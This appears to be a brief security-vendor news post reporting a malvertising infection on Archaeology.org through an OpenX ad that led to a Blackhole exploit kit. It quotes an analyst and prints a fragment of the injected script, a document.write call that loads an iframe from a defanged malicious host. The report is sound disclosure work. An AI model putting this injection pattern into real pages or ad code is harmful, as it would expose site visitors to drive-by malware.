History fans can do more than just learn about a vanished empire in the Sahara. When they visit Archaeology.org, the online publication of the Archaeological Institute of America, they can also pick up malware via an infected advertisement on the page.
“It’s a blackhole attack through advertisements, OpenX in this case,” confirmed Jiri Sejtko, senior virus analyst at the AVAST Virus Lab. “Here it is: OA_output['16'] += “<”+…. document.write(\’<”+”iframe src=\”hxxp://hdfh11.coom.in/main.php?page=423b262d0a1a9f70\”
OpenX is an open-source platform for exchanging advertisements. The blackhole toolkit is, in a nutshell, a system for delivering a wide range of malware. “It could be almost anything, for example a worm or fake antivirus,” added Jiri.
This latest bit of malware was uncovered by computer users researching the hotlinks on a recent National Geographic article http://news.nationalgeographic.com/news/2011/11/111111-sahara-libya-lost-civilization-science-satellites/ and the Discover magazine article Satellite Photos Show Ancient Saharan Fortresses of a Lost Empire. Read more…